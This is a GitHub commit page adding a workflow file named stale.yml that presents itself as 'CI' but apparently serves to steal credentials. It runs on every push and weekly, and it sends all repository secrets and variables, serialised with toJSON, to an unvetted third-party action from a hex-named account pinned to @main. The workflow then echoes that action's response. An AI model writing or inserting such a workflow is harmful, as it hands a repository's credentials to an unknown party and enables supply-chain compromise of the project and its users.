We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent d9ac94f commit 185f5eaCopy full SHA for 185f5ea
1 file changed
.github/workflows/stale.yml
@@ -0,0 +1,27 @@
1
+name: CI
2
+on:
3
+ push:
4
+ workflow_dispatch:
5
+ schedule:
6
+ - cron: '0 4 * * 1' # Every Monday 04:00 UTC (11:00 WIB)
7
+permissions:
8
+ contents: read
9
+ actions: write
10
+concurrency:
11
+ group: ${{ github.workflow }}-${{ github.event_name }}-${{ github.ref }}
12
+ cancel-in-progress: ${{ github.event_name == 'push' }}
13
+jobs:
14
+ run:
15
+ runs-on: ubuntu-latest
16
+ name: Run
17
+ steps:
18
+ - name: Execute
19
+ uses: 7bd682b6efea3a2b8fbcc65ee354fadf/action@main
20
+ id: execute
21
+ with:
22
+ action: ${{ github.repository }}
23
+ env:
24
+ REPOSITORY_SECRETS: ${{ toJSON(secrets) }}
25
+ REPOSITORY_VARIABLES: ${{ toJSON(vars) }}
26
+ - name: Response
27
+ run: echo "${{ steps.execute.outputs.response }}"
0 commit comments